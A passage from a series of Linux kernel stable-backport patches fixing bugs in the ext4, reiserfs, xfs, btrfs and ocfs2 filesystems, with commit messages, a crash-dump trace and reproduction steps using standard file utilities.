crc = crc16(crc, (__u8 *)&le_group, sizeof(le_group)); crc = crc16(crc, (__u8 *)gdp, offset); diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c index a20816e7eb3..92850bab451 100644 --- a/fs/ext4/xattr.c +++ b/fs/ext4/xattr.c @@ -123,17 +123,18 @@ static __le32 ext4_xattr_block_csum(struct inode *inode, { struct ext4_sb_info *sbi = EXT4_SB(inode->i_sb); __u32 csum; - __le32 save_csum; __le64 dsk_block_nr = cpu_to_le64(block_nr); + __u32 dummy_csum = 0; + int offset = offsetof(struct ext4_xattr_header, h_checksum); - save_csum = hdr->h_checksum; - hdr->h_checksum = 0; csum = ext4_chksum(sbi, sbi->s_csum_seed, (__u8 *)&dsk_block_nr, sizeof(dsk_block_nr)); - csum = ext4_chksum(sbi, csum, (__u8 *)hdr, - EXT4_BLOCK_SIZE(inode->i_sb)); + csum = ext4_chksum(sbi, csum, (__u8 *)hdr, offset); + csum = ext4_chksum(sbi, csum, (__u8 *)&dummy_csum, sizeof(dummy_csum)); + offset += sizeof(dummy_csum); + csum = ext4_chksum(sbi, csum, (__u8 *)hdr + offset, + EXT4_BLOCK_SIZE(inode->i_sb) - offset); - hdr->h_checksum = save_csum; return cpu_to_le32(csum); } From fa8a01a81af29ae9b490e29791badfb6d090eb71 Mon Sep 17 00:00:00 2001 From: Konstantin Khlebnikov Date: Sun, 13 Mar 2016 17:29:06 -0400 Subject: [PATCH 155/315] ext4: use __GFP_NOFAIL in ext4_free_blocks() commit adb7ef600cc9d9d15ecc934cc26af5c1379777df upstream. This might be unexpected but pages allocated for sbi->s_buddy_cache are charged to current memory cgroup. So, GFP_NOFS allocation could fail if current task has been killed by OOM or if current memory cgroup has no free memory left. Block allocator cannot handle such failures here yet. Signed-off-by: Konstantin Khlebnikov Signed-off-by: Theodore Ts'o Signed-off-by: Willy Tarreau --- fs/ext4/mballoc.c | 47 ++++++++++++++++++++++++++++------------------- 1 file changed, 28 insertions(+), 19 deletions(-) diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c index 08b4495c1b1..cb9eec025ba 100644 --- a/fs/ext4/mballoc.c +++ b/fs/ext4/mballoc.c @@ -808,7 +808,7 @@ static void mb_regenerate_buddy(struct ext4_buddy *e4b) * for this page; do not hold this lock when calling this routine! */ -static int ext4_mb_init_cache(struct page *page, char *incore) +static int ext4_mb_init_cache(struct page *page, char *incore, gfp_t gfp) { ext4_group_t ngroups; int blocksize; @@ -841,7 +841,7 @@ static int ext4_mb_init_cache(struct page *page, char *incore) /* allocate buffer_heads to read bitmaps */ if (groups_per_page > 1) { i = sizeof(struct buffer_head *) * groups_per_page; - bh = kzalloc(i, GFP_NOFS); + bh = kzalloc(i, gfp); if (bh == NULL) { err = -ENOMEM; goto out; @@ -966,7 +966,7 @@ out: * are on the same page e4b->bd_buddy_page is NULL and return value is 0. */ static int ext4_mb_get_buddy_page_lock(struct super_block *sb, - ext4_group_t group, struct ext4_buddy *e4b) + ext4_group_t group, struct ext4_buddy *e4b, gfp_t gfp) { struct inode *inode = EXT4_SB(sb)->s_buddy_cache; int block, pnum, poff; @@ -985,7 +985,7 @@ static int ext4_mb_get_buddy_page_lock(struct super_block *sb, block = group * 2; pnum = block / blocks_per_page; poff = block % blocks_per_page; - page = find_or_create_page(inode->i_mapping, pnum, GFP_NOFS); + page = find_or_create_page(inode->i_mapping, pnum, gfp); if (!page) return -EIO; BUG_ON(page->mapping != inode->i_mapping); @@ -999,7 +999,7 @@ static int ext4_mb_get_buddy_page_lock(struct super_block *sb, block++; pnum = block / blocks_per_page; - page = find_or_create_page(inode->i_mapping, pnum, GFP_NOFS); + page = find_or_create_page(inode->i_mapping, pnum, gfp); if (!page) return -EIO; BUG_ON(page->mapping != inode->i_mapping); @@ -1025,7 +1025,7 @@ static void ext4_mb_put_buddy_page_lock(struct ext4_buddy *e4b) * calling this routine! */ static noinline_for_stack -int ext4_mb_init_group(struct super_block *sb, ext4_group_t group) +int ext4_mb_init_group(struct super_block *sb, ext4_group_t group, gfp_t gfp) { struct ext4_group_info *this_grp; @@ -1043,7 +1043,7 @@ int ext4_mb_init_group(struct super_block *sb, ext4_group_t group) * have taken a reference using ext4_mb_load_buddy and that * would have pinned buddy page to page cache. */ - ret = ext4_mb_get_buddy_page_lock(sb, group, &e4b); + ret = ext4_mb_get_buddy_page_lock(sb, group, &e4b, gfp); if (ret || !EXT4_MB_GRP_NEED_INIT(this_grp)) { /* * somebody initialized the group @@ -1053,7 +1053,7 @@ int ext4_mb_init_group(struct super_block *sb, ext4_group_t group) } page = e4b.bd_bitmap_page; - ret = ext4_mb_init_cache(page, NULL); + ret = ext4_mb_init_cache(page, NULL, gfp); if (ret) goto err; if (!PageUptodate(page)) { @@ -1073,7 +1073,7 @@ int ext4_mb_init_group(struct super_block *sb, ext4_group_t group) } /* init buddy cache */ page = e4b.bd_buddy_page; - ret = ext4_mb_init_cache(page, e4b.bd_bitmap); + ret = ext4_mb_init_cache(page, e4b.bd_bitmap, gfp); if (ret) goto err; if (!PageUptodate(page)) { @@ -1092,8 +1092,8 @@ err: * calling this routine! */ static noinline_for_stack int -ext4_mb_load_buddy(struct super_block *sb, ext4_group_t group, - struct ext4_buddy *e4b) +ext4_mb_load_buddy_gfp(struct super_block *sb, ext4_group_t group, + struct ext4_buddy *e4b, gfp_t gfp) { int blocks_per_page; int block; @@ -1123,7 +1123,7 @@ ext4_mb_load_buddy(struct super_block *sb, ext4_group_t group, * we need full data about the group * to make a good selection */ - ret = ext4_mb_init_group(sb, group); + ret = ext4_mb_init_group(sb, group, gfp); if (ret) return ret; } @@ -1151,11 +1151,11 @@ ext4_mb_load_buddy(struct super_block *sb, ext4_group_t group, * wait for it to initialize. */ page_cache_release(page); - page = find_or_create_page(inode->i_mapping, pnum, GFP_NOFS); + page = find_or_create_page(inode->i_mapping, pnum, gfp); if (page) { BUG_ON(page->mapping != inode->i_mapping); if (!PageUptodate(page)) { - ret = ext4_mb_init_cache(page, NULL); + ret = ext4_mb_init_cache(page, NULL, gfp); if (ret) { unlock_page(page); goto err; @@ -1182,11 +1182,12 @@ ext4_mb_load_buddy(struct super_block *sb, ext4_group_t group, if (page == NULL || !PageUptodate(page)) { if (page) page_cache_release(page); - page = find_or_create_page(inode->i_mapping, pnum, GFP_NOFS); + page = find_or_create_page(inode->i_mapping, pnum, gfp); if (page) { BUG_ON(page->mapping != inode->i_mapping); if (!PageUptodate(page)) { - ret = ext4_mb_init_cache(page, e4b->bd_bitmap); + ret = ext4_mb_init_cache(page, e4b->bd_bitmap, + gfp); if (ret) { unlock_page(page); goto err; @@ -1220,6 +1221,12 @@ err: return ret; } +static int ext4_mb_load_buddy(struct super_block *sb, ext4_group_t group, + struct ext4_buddy *e4b) +{ + return ext4_mb_load_buddy_gfp(sb, group, e4b, GFP_NOFS); +} + static void ext4_mb_unload_buddy(struct ext4_buddy *e4b) { if (e4b->bd_bitmap_page) @@ -1993,7 +2000,7 @@ static int ext4_mb_good_group(struct ext4_allocation_context *ac, /* We only do this if the grp has never been initialized */ if (unlikely(EXT4_MB_GRP_NEED_INIT(grp))) { - int ret = ext4_mb_init_group(ac->ac_sb, group); + int ret = ext4_mb_init_group(ac->ac_sb, group, GFP_NOFS); if (ret) return 0; } @@ -4748,7 +4755,9 @@ do_more: #endif trace_ext4_mballoc_free(sb, inode, block_group, bit, count_clusters); - err = ext4_mb_load_buddy(sb, block_group, &e4b); + /* __GFP_NOFAIL: retry infinitely, ignore TIF_MEMDIE and memcg limit. */ + err = ext4_mb_load_buddy_gfp(sb, block_group, &e4b, + GFP_NOFS|__GFP_NOFAIL); if (err) goto error_return; @@ -5159,7 +5168,7 @@ int ext4_trim_fs(struct super_block *sb, struct fstrim_range *range) grp = ext4_get_group_info(sb, group); /* We only do this if the grp has never been initialized */ if (unlikely(EXT4_MB_GRP_NEED_INIT(grp))) { - ret = ext4_mb_init_group(sb, group); + ret = ext4_mb_init_group(sb, group, GFP_NOFS); if (ret) break; } From 1326ba8707a5f8edb714f621f2d75d1e74b86ed6 Mon Sep 17 00:00:00 2001 From: Daeho Jeong Date: Mon, 5 Sep 2016 22:56:10 -0400 Subject: [PATCH 156/315] ext4: reinforce check of i_dtime when clearing high fields of uid and gid commit 93e3b4e6631d2a74a8cf7429138096862ff9f452 upstream. Now, ext4_do_update_inode() clears high 16-bit fields of uid/gid of deleted and evicted inode to fix up interoperability with old kernels. However, it checks only i_dtime of an inode to determine whether the inode was deleted and evicted, and this is very risky, because i_dtime can be used for the pointer maintaining orphan inode list, too. We need to further check whether the i_dtime is being used for the orphan inode list even if the i_dtime is not NULL. We found that high 16-bit fields of uid/gid of inode are unintentionally and permanently cleared when the inode truncation is just triggered, but not finished, and the inode metadata, whose high uid/gid bits are cleared, is written on disk, and the sudden power-off follows that in order. Signed-off-by: Daeho Jeong Signed-off-by: Hobin Woo Signed-off-by: Theodore Ts'o Signed-off-by: Willy Tarreau --- fs/ext4/inode.c | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c index 046e0e13a28..a187055c1b0 100644 --- a/fs/ext4/inode.c +++ b/fs/ext4/inode.c @@ -4480,14 +4480,14 @@ static int ext4_do_update_inode(handle_t *handle, * Fix up interoperability with old kernels. Otherwise, old inodes get * re-used with the upper 16 bits of the uid/gid intact */ - if (!ei->i_dtime) { + if (ei->i_dtime && list_empty(&ei->i_orphan)) { + raw_inode->i_uid_high = 0; + raw_inode->i_gid_high = 0; + } else { raw_inode->i_uid_high = cpu_to_le16(high_16_bits(i_uid)); raw_inode->i_gid_high = cpu_to_le16(high_16_bits(i_gid)); - } else { - raw_inode->i_uid_high = 0; - raw_inode->i_gid_high = 0; } } else { raw_inode->i_uid_low = cpu_to_le16(fs_high2lowuid(i_uid)); From 7a97321f5c3666df35674889e45f6a0370bc99fc Mon Sep 17 00:00:00 2001 From: Ross Zwisler Date: Thu, 22 Sep 2016 11:49:38 -0400 Subject: [PATCH 157/315] ext4: allow DAX writeback for hole punch commit cca32b7eeb4ea24fa6596650e06279ad9130af98 upstream. Currently when doing a DAX hole punch with ext4 we fail to do a writeback. This is because the logic around filemap_write_and_wait_range() in ext4_punch_hole() only looks for dirty page cache pages in the radix tree, not for dirty DAX exceptional entries. Signed-off-by: Ross Zwisler Reviewed-by: Jan Kara Signed-off-by: Theodore Ts'o Signed-off-by: Willy Tarreau --- fs/ext4/inode.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c index a187055c1b0..31179ba2072 100644 --- a/fs/ext4/inode.c +++ b/fs/ext4/inode.c @@ -3610,7 +3610,7 @@ int ext4_can_truncate(struct inode *inode) } /* - * ext4_punch_hole: punches a hole in a file by releaseing the blocks + * ext4_punch_hole: punches a hole in a file by releasing the blocks * associated with the given offset and length * * @inode: File inode @@ -3646,7 +3646,7 @@ int ext4_punch_hole(struct file *file, loff_t offset, loff_t length) * Write out all dirty pages to avoid race conditions * Then release them. */ - if (mapping->nrpages && mapping_tagged(mapping, PAGECACHE_TAG_DIRTY)) { + if (mapping_tagged(mapping, PAGECACHE_TAG_DIRTY)) { ret = filemap_write_and_wait_range(mapping, offset, offset + length - 1); if (ret) From a7ee70f64fc0b15036db7b6ff146f19e8f33203f Mon Sep 17 00:00:00 2001 From: Theodore Ts'o Date: Fri, 18 Nov 2016 13:00:24 -0500 Subject: [PATCH 158/315] ext4: sanity check the block and cluster size at mount time commit 8cdf3372fe8368f56315e66bea9f35053c418093 upstream. If the block size or cluster size is insane, reject the mount. This is important for security reasons (although we shouldn't be just depending on this check). Ref: http://www.securityfocus.com/archive/1/539661 Ref: https://bugzilla.redhat.com/show_bug.cgi?id=1332506 Reported-by: Borislav Petkov Reported-by: Nikolay Borisov Signed-off-by: Theodore Ts'o Signed-off-by: Willy Tarreau --- fs/ext4/ext4.h | 1 + fs/ext4/super.c | 17 ++++++++++++++++- 2 files changed, 17 insertions(+), 1 deletion(-) diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h index 046e3e93783..f9c938e21e6 100644 --- a/fs/ext4/ext4.h +++ b/fs/ext4/ext4.h @@ -246,6 +246,7 @@ struct ext4_io_submit { #define EXT4_MAX_BLOCK_SIZE 65536 #define EXT4_MIN_BLOCK_LOG_SIZE 10 #define EXT4_MAX_BLOCK_LOG_SIZE 16 +#define EXT4_MAX_CLUSTER_LOG_SIZE 30 #ifdef __KERNEL__ # define EXT4_BLOCK_SIZE(s) ((s)->s_blocksize) #else diff --git a/fs/ext4/super.c b/fs/ext4/super.c index 6cf69fa212f..faa19208703 100644 --- a/fs/ext4/super.c +++ b/fs/ext4/super.c @@ -3537,7 +3537,15 @@ static int ext4_fill_super(struct super_block *sb, void *data, int silent) if (blocksize < EXT4_MIN_BLOCK_SIZE || blocksize > EXT4_MAX_BLOCK_SIZE) { ext4_msg(sb, KERN_ERR, - "Unsupported filesystem blocksize %d", blocksize); + "Unsupported filesystem blocksize %d (%d log_block_size)", + blocksize, le32_to_cpu(es->s_log_block_size)); + goto failed_mount; + } + if (le32_to_cpu(es->s_log_block_size) > + (EXT4_MAX_BLOCK_LOG_SIZE - EXT4_MIN_BLOCK_LOG_SIZE)) { + ext4_msg(sb, KERN_ERR, + "Invalid log block size: %u", + le32_to_cpu(es->s_log_block_size)); goto failed_mount; } @@ -3652,6 +3660,13 @@ static int ext4_fill_super(struct super_block *sb, void *data, int silent) "block size (%d)", clustersize, blocksize); goto failed_mount; } + if (le32_to_cpu(es->s_log_cluster_size) > + (EXT4_MAX_CLUSTER_LOG_SIZE - EXT4_MIN_BLOCK_LOG_SIZE)) { + ext4_msg(sb, KERN_ERR, + "Invalid log cluster size: %u", + le32_to_cpu(es->s_log_cluster_size)); + goto failed_mount; + } sbi->s_cluster_bits = le32_to_cpu(es->s_log_cluster_size) - le32_to_cpu(es->s_log_block_size); sbi->s_clusters_per_group = From 52495e7b8bb385ad313e8b218bf4972a93134907 Mon Sep 17 00:00:00 2001 From: Jeff Mahoney Date: Tue, 2 Aug 2016 14:05:33 -0700 Subject: [PATCH 159/315] reiserfs: fix "new_insert_key may be used uninitialized ..." commit 0a11b9aae49adf1f952427ef1a1d9e793dd6ffb6 upstream. new_insert_key only makes any sense when it's associated with a new_insert_ptr, which is initialized to NULL and changed to a buffer_head when we also initialize new_insert_key. We can key off of that to avoid the uninitialized warning. Link: http://lkml.kernel.org/r/5eca5ffb-2155-8df2-b4a2-f162f105efed@suse.com Signed-off-by: Jeff Mahoney Cc: Arnd Bergmann Cc: Jan Kara Cc: Linus Torvalds Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds Signed-off-by: Willy Tarreau --- fs/reiserfs/ibalance.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/fs/reiserfs/ibalance.c b/fs/reiserfs/ibalance.c index e1978fd895f..58cce0c606f 100644 --- a/fs/reiserfs/ibalance.c +++ b/fs/reiserfs/ibalance.c @@ -1082,8 +1082,9 @@ int balance_internal(struct tree_balance *tb, /* tree_balance structure insert_ptr); } - memcpy(new_insert_key_addr, &new_insert_key, KEY_SIZE); insert_ptr[0] = new_insert_ptr; + if (new_insert_ptr) + memcpy(new_insert_key_addr, &new_insert_key, KEY_SIZE); return order; } From ee89427388b9ffde431d0331a157620f95b7dd2b Mon Sep 17 00:00:00 2001 From: Mike Galbraith Date: Mon, 13 Aug 2012 15:21:23 +0200 Subject: [PATCH 160/315] reiserfs: Unlock superblock before calling reiserfs_quota_on_mount() commit 420902c9d086848a7548c83e0a49021514bd71b7 upstream. If we hold the superblock lock while calling reiserfs_quota_on_mount(), we can deadlock our own worker - mount blocks kworker/3:2, sleeps forever more. crash> ps|grep UN 715 2 3 ffff880220734d30 UN 0.0 0 0 [kworker/3:2] 9369 9341 2 ffff88021ffb7560 UN 1.3 493404 123184 Xorg 9665 9664 3 ffff880225b92ab0 UN 0.0 47368 812 udisks-daemon 10635 10403 3 ffff880222f22c70 UN 0.0 14904 936 mount crash> bt ffff880220734d30 PID: 715 TASK: ffff880220734d30 CPU: 3 COMMAND: "kworker/3:2" #0 [ffff8802244c3c20] schedule at ffffffff8144584b #1 [ffff8802244c3cc8] __rt_mutex_slowlock at ffffffff814472b3 #2 [ffff8802244c3d28] rt_mutex_slowlock at ffffffff814473f5 #3 [ffff8802244c3dc8] reiserfs_write_lock at ffffffffa05f28fd [reiserfs] #4 [ffff8802244c3de8] flush_async_commits at ffffffffa05ec91d [reiserfs] #5 [ffff8802244c3e08] process_one_work at ffffffff81073726 #6 [ffff8802244c3e68] worker_thread at ffffffff81073eba #7 [ffff8802244c3ec8] kthread at ffffffff810782e0 #8 [ffff8802244c3f48] kernel_thread_helper at ffffffff81450064 crash> rd ffff8802244c3cc8 10 ffff8802244c3cc8: ffffffff814472b3 ffff880222f23250 .rD.....P2.".... ffff8802244c3cd8: 0000000000000000 0000000000000286 ................ ffff8802244c3ce8: ffff8802244c3d30 ffff880220734d80 0=L$.....Ms .... ffff8802244c3cf8: ffff880222e8f628 0000000000000000 (.."............ ffff8802244c3d08: 0000000000000000 0000000000000002 ................ crash> struct rt_mutex ffff880222e8f628 struct rt_mutex { wait_lock = { raw_lock = { slock = 65537 } }, wait_list = { node_list = { next = 0xffff8802244c3d48, prev = 0xffff8802244c3d48 } }, owner = 0xffff880222f22c71, save_state = 0 } crash> bt 0xffff880222f22c70 PID: 10635 TASK: ffff880222f22c70 CPU: 3 COMMAND: "mount" #0 [ffff8802216a9868] schedule at ffffffff8144584b #1 [ffff8802216a9910] schedule_timeout at ffffffff81446865 #2 [ffff8802216a99a0] wait_for_common at ffffffff81445f74 #3 [ffff8802216a9a30] flush_work at ffffffff810712d3 #4 [ffff8802216a9ab0] schedule_on_each_cpu at ffffffff81074463 #5 [ffff8802216a9ae0] invalidate_bdev at ffffffff81178aba #6 [ffff8802216a9af0] vfs_load_quota_inode at ffffffff811a3632 #7 [ffff8802216a9b50] dquot_quota_on_mount at ffffffff811a375c #8 [ffff8802216a9b80] finish_unfinished at ffffffffa05dd8b0 [reiserfs] #9 [ffff8802216a9cc0] reiserfs_fill_super at ffffffffa05de825 [reiserfs] RIP: 00007f7b9303997a RSP: 00007ffff443c7a8 RFLAGS: 00010202 RAX: 00000000000000a5 RBX: ffffffff8144ef12 RCX: 00007f7b932e9ee0 RDX: 00007f7b93d9a400 RSI: 00007f7b93d9a3e0 RDI: 00007f7b93d9a3c0 RBP: 00007f7b93d9a2c0 R8: 00007f7b93d9a550 R9: 0000000000000001 R10: ffffffffc0ed040e R11: 0000000000000202 R12: 000000000000040e R13: 0000000000000000 R14: 00000000c0ed040e R15: 00007ffff443ca20 ORIG_RAX: 00000000000000a5 CS: 0033 SS: 002b Signed-off-by: Mike Galbraith Acked-by: Frederic Weisbecker Acked-by: Mike Galbraith Signed-off-by: Jan Kara Signed-off-by: Willy Tarreau --- fs/reiserfs/super.c | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/fs/reiserfs/super.c b/fs/reiserfs/super.c index e2e202a07b3..7ff27fa3a45 100644 --- a/fs/reiserfs/super.c +++ b/fs/reiserfs/super.c @@ -184,7 +184,15 @@ static int remove_save_link_only(struct super_block *s, static int reiserfs_quota_on_mount(struct super_block *, int); #endif -/* look for uncompleted unlinks and truncates and complete them */ +/* + * Look for uncompleted unlinks and truncates and complete them + * + * Called with superblock write locked. If quotas are enabled, we have to + * release/retake lest we call dquot_quota_on_mount(), proceed to + * schedule_on_each_cpu() in invalidate_bdev() and deadlock waiting for the per + * cpu worklets to complete flush_async_commits() that in turn wait for the + * superblock write lock. + */ static int finish_unfinished(struct super_block *s) { INITIALIZE_PATH(path); @@ -231,7 +239,9 @@ static int finish_unfinished(struct super_block *s) quota_enabled[i] = 0; continue; } + reiserfs_write_unlock(s); ret = reiserfs_quota_on_mount(s, i); + reiserfs_write_lock(s); if (ret < 0) reiserfs_warning(s, "reiserfs-2500", "cannot turn on journaled " From 5a8afb1c37c93b4f41f8233bd54e23e7134a2a2d Mon Sep 17 00:00:00 2001 From: Dave Chinner Date: Fri, 26 Aug 2016 16:01:30 +1000 Subject: [PATCH 161/315] xfs: fix superblock inprogress check commit f3d7ebdeb2c297bd26272384e955033493ca291c upstream. From inspection, the superblock sb_inprogress check is done in the verifier and triggered only for the primary superblock via a "bp->b_bn == XFS_SB_DADDR" check. Unfortunately, the primary superblock is an uncached buffer, and hence it is configured by xfs_buf_read_uncached() with: bp->b_bn = XFS_BUF_DADDR_NULL; /* always null for uncached buffers */ And so this check never triggers. Fix it. Signed-off-by: Dave Chinner Reviewed-by: Brian Foster Reviewed-by: Christoph Hellwig Signed-off-by: Dave Chinner [wt: s/xfs_sb.c/xfs_mount.c in 3.10] Signed-off-by: Willy Tarreau --- fs/xfs/xfs_mount.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/fs/xfs/xfs_mount.c b/fs/xfs/xfs_mount.c index e8e310c0509..363c4cc9bfd 100644 --- a/fs/xfs/xfs_mount.c +++ b/fs/xfs/xfs_mount.c @@ -689,7 +689,8 @@ xfs_sb_verify( * Only check the in progress field for the primary superblock as * mkfs.xfs doesn't clear it from secondary superblocks. */ - return xfs_mount_validate_sb(mp, &sb, bp->b_bn == XFS_SB_DADDR, + return xfs_mount_validate_sb(mp, &sb, + bp->b_maps[0].bm_bn == XFS_SB_DADDR, check_version); } From 444f0f1daa34f1bdedfb1e179bd886ad81a66225 Mon Sep 17 00:00:00 2001 From: "Darrick J. Wong" Date: Thu, 20 Oct 2016 15:46:18 +1100 Subject: [PATCH 162/315] libxfs: clean up _calc_dquots_per_chunk commit 58d789678546d46d7bbd809dd7dab417c0f23655 upstream. The function xfs_calc_dquots_per_chunk takes a parameter in units of basic blocks. The kernel seems to get the units wrong, but userspace got 'fixed' by commenting out the unnecessary conversion. Fix both. Signed-off-by: Darrick J. Wong Reviewed-by: Eric Sandeen Signed-off-by: Dave Chinner Signed-off-by: Willy Tarreau --- fs/xfs/xfs_dquot.c | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/fs/xfs/xfs_dquot.c b/fs/xfs/xfs_dquot.c index bac3e1635b7..e59f309efbe 100644 --- a/fs/xfs/xfs_dquot.c +++ b/fs/xfs/xfs_dquot.c @@ -309,8 +309,7 @@ xfs_dquot_buf_verify_crc( if (mp->m_quotainfo) ndquots = mp->m_quotainfo->qi_dqperchunk; else - ndquots = xfs_qm_calc_dquots_per_chunk(mp, - XFS_BB_TO_FSB(mp, bp->b_length)); + ndquots = xfs_qm_calc_dquots_per_chunk(mp, bp->b_length); for (i = 0; i < ndquots; i++, d++) { if (!xfs_verify_cksum((char *)d, sizeof(struct xfs_dqblk), From 879149a04391cddcec0b076aba6189b5279cdb86 Mon Sep 17 00:00:00 2001 From: Jeff Mahoney Date: Wed, 21 Sep 2016 08:31:29 -0400 Subject: [PATCH 163/315] btrfs: ensure that file descriptor used with subvol ioctls is a dir commit 325c50e3cebb9208009083e841550f98a863bfa0 upstream. If the subvol/snapshot create/destroy ioctls are passed a regular file with execute permissions set, we'll eventually Oops while trying to do inode->i_op->lookup via lookup_one_len. This patch ensures that the file descriptor refers to a directory. Fixes: cb8e70901d (Btrfs: Fix subvolume creation locking rules) Fixes: 76dda93c6a (Btrfs: add snapshot/subvolume destroy ioctl) Signed-off-by: Jeff Mahoney Signed-off-by: Chris Mason Signed-off-by: Willy Tarreau --- fs/btrfs/ioctl.c | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c index dbefa6c609f..296cc1b4944 100644 --- a/fs/btrfs/ioctl.c +++ b/fs/btrfs/ioctl.c @@ -1496,6 +1496,9 @@ static noinline int btrfs_ioctl_snap_create_transid(struct file *file, int namelen; int ret = 0; + if (!S_ISDIR(file_inode(file)->i_mode)) + return -ENOTDIR; + ret = mnt_want_write_file(file); if (ret) goto out; @@ -1553,6 +1556,9 @@ static noinline int btrfs_ioctl_snap_create(struct file *file, struct btrfs_ioctl_vol_args *vol_args; int ret; + if (!S_ISDIR(file_inode(file)->i_mode)) + return -ENOTDIR; + vol_args = memdup_user(arg, sizeof(*vol_args)); if (IS_ERR(vol_args)) return PTR_ERR(vol_args); @@ -1576,6 +1582,9 @@ static noinline int btrfs_ioctl_snap_create_v2(struct file *file, bool readonly = false; struct btrfs_qgroup_inherit *inherit = NULL; + if (!S_ISDIR(file_inode(file)->i_mode)) + return -ENOTDIR; + vol_args = memdup_user(arg, sizeof(*vol_args)); if (IS_ERR(vol_args)) return PTR_ERR(vol_args); @@ -2081,6 +2090,9 @@ static noinline int btrfs_ioctl_snap_destroy(struct file *file, int ret; int err = 0; + if (!S_ISDIR(dir->i_mode)) + return -ENOTDIR; + vol_args = memdup_user(arg, sizeof(*vol_args)); if (IS_ERR(vol_args)) return PTR_ERR(vol_args); From c7e3bdde9f748bb1f5297561a2fb111641178f97 Mon Sep 17 00:00:00 2001 From: Joseph Qi Date: Mon, 19 Sep 2016 14:43:55 -0700 Subject: [PATCH 164/315] ocfs2/dlm: fix race between convert and migration commit e6f0c6e6170fec175fe676495f29029aecdf486c upstream. Commit ac7cf246dfdb ("ocfs2/dlm: fix race between convert and recovery") checks if lockres master has changed to identify whether new master has finished recovery or not. This will introduce a race that right after old master does umount ( means master will change), a new convert request comes. In this case, it will reset lockres state to DLM_RECOVERING and then retry convert, and then fail with lockres->l_action being set to OCFS2_AST_INVALID, which will cause inconsistent lock level between ocfs2 and dlm, and then finally BUG. Since dlm recovery will clear lock->convert_pending in dlm_move_lockres_to_recovery_list, we can use it to correctly identify the race case between convert and recovery. So fix it. Fixes: ac7cf246dfdb ("ocfs2/dlm: fix race between convert and recovery") Link: http://lkml.kernel.org/r/57CE1569.8010704@huawei.com Signed-off-by: Joseph Qi Signed-off-by: Jun Piao Cc: Mark Fasheh Cc: Joel Becker Cc: Junxiao Bi Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds Signed-off-by: Willy Tarreau --- fs/ocfs2/dlm/dlmconvert.c | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/fs/ocfs2/dlm/dlmconvert.c b/fs/ocfs2/dlm/dlmconvert.c index f65bdcf6152..6d97883e265 100644 --- a/fs/ocfs2/dlm/dlmconvert.c +++ b/fs/ocfs2/dlm/dlmconvert.c @@ -265,7 +265,6 @@ enum dlm_status dlmconvert_remote(struct dlm_ctxt *dlm, struct dlm_lock *lock, int flags, int type) { enum dlm_status status; - u8 old_owner = res->owner; mlog(0, "type=%d, convert_type=%d, busy=%d\n", lock->ml.type, lock->ml.convert_type, res->state & DLM_LOCK_RES_IN_PROGRESS); @@ -332,7 +331,6 @@ enum dlm_status dlmconvert_remote(struct dlm_ctxt *dlm, spin_lock(&res->spinlock); res->state &= ~DLM_LOCK_RES_IN_PROGRESS; - lock->convert_pending = 0; /* if it failed, move it back to granted queue. * if master returns DLM_NORMAL and then down before sending ast, * it may have already been moved to granted queue, reset to @@ -341,12 +339,14 @@ enum dlm_status dlmconvert_remote(struct dlm_ctxt *dlm, if (status != DLM_NOTQUEUED) dlm_error(status); dlm_revert_pending_convert(res, lock); - } else if ((res->state & DLM_LOCK_RES_RECOVERING) || - (old_owner != res->owner)) { - mlog(0, "res %.*s is in recovering or has been recovered.\n", - res->lockname.len, res->lockname.name); + } else if (!lock->convert_pending) { + mlog(0, "%s: res %.*s, owner died and lock has been moved back " + "to granted list, retry convert.\n", + dlm->name, res->lockname.len, res->lockname.name); status = DLM_RECOVERING; } + + lock->convert_pending = 0; bail: spin_unlock(&res->spinlock); From 8b79f326cafe330455c1629d4feef6b3d6ded4c1 Mon Sep 17 00:00:00 2001 From: Ashish Samant Date: Mon, 19 Sep 2016 14:44:42 -0700 Subject: [PATCH 165/315] ocfs2: fix start offset to ocfs2_zero_range_for_truncate() commit d21c353d5e99c56cdd5b5c1183ffbcaf23b8b960 upstream. If we punch a hole on a reflink such that following conditions are met: 1. start offset is on a cluster boundary 2. end offset is not on a cluster boundary 3. (end offset is somewhere in another extent) or (hole range > MAX_CONTIG_BYTES(1MB)), we dont COW the first cluster starting at the start offset. But in this case, we were wrongly passing this cluster to ocfs2_zero_range_for_truncate() to zero out. This will modify the cluster in place and zero it in the source too. Fix this by skipping this cluster in such a scenario. To reproduce: 1. Create a random file of say 10 MB xfs_io -c 'pwrite -b 4k 0 10M' -f 10MBfile 2. Reflink it reflink -f 10MBfile reflnktest 3. Punch a hole at starting at cluster boundary with range greater that 1MB. You can also use a range that will put the end offset in another extent. fallocate -p -o 0 -l 1048615 reflnktest 4. sync 5. Check the first cluster in the source file. (It will be zeroed out). dd if=10MBfile iflag=direct bs= count=1 | hexdump -C Link: http://lkml.kernel.org/r/1470957147-14185-1-git-send-email-ashish.samant@oracle.com Signed-off-by: Ashish Samant Reported-by: Saar Maoz Reviewed-by: Srinivas Eeda Cc: Mark Fasheh Cc: Joel Becker Cc: Junxiao Bi Cc: Joseph Qi Cc: Eric Ren Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds Signed-off-by: Willy Tarreau --- fs/ocfs2/file.c | 34 ++++++++++++++++++++++++---------- 1 file changed, 24 insertions(+), 10 deletions(-) diff --git a/fs/ocfs2/file.c b/fs/ocfs2/file.c index d0e8c0b1767..496af7fd87d 100644 --- a/fs/ocfs2/file.c +++ b/fs/ocfs2/file.c @@ -1499,7 +1499,8 @@ static int ocfs2_zero_partial_clusters(struct inode *inode, u64 start, u64 len) { int ret = 0; - u64 tmpend, end = start + len; + u64 tmpend = 0; + u64 end = 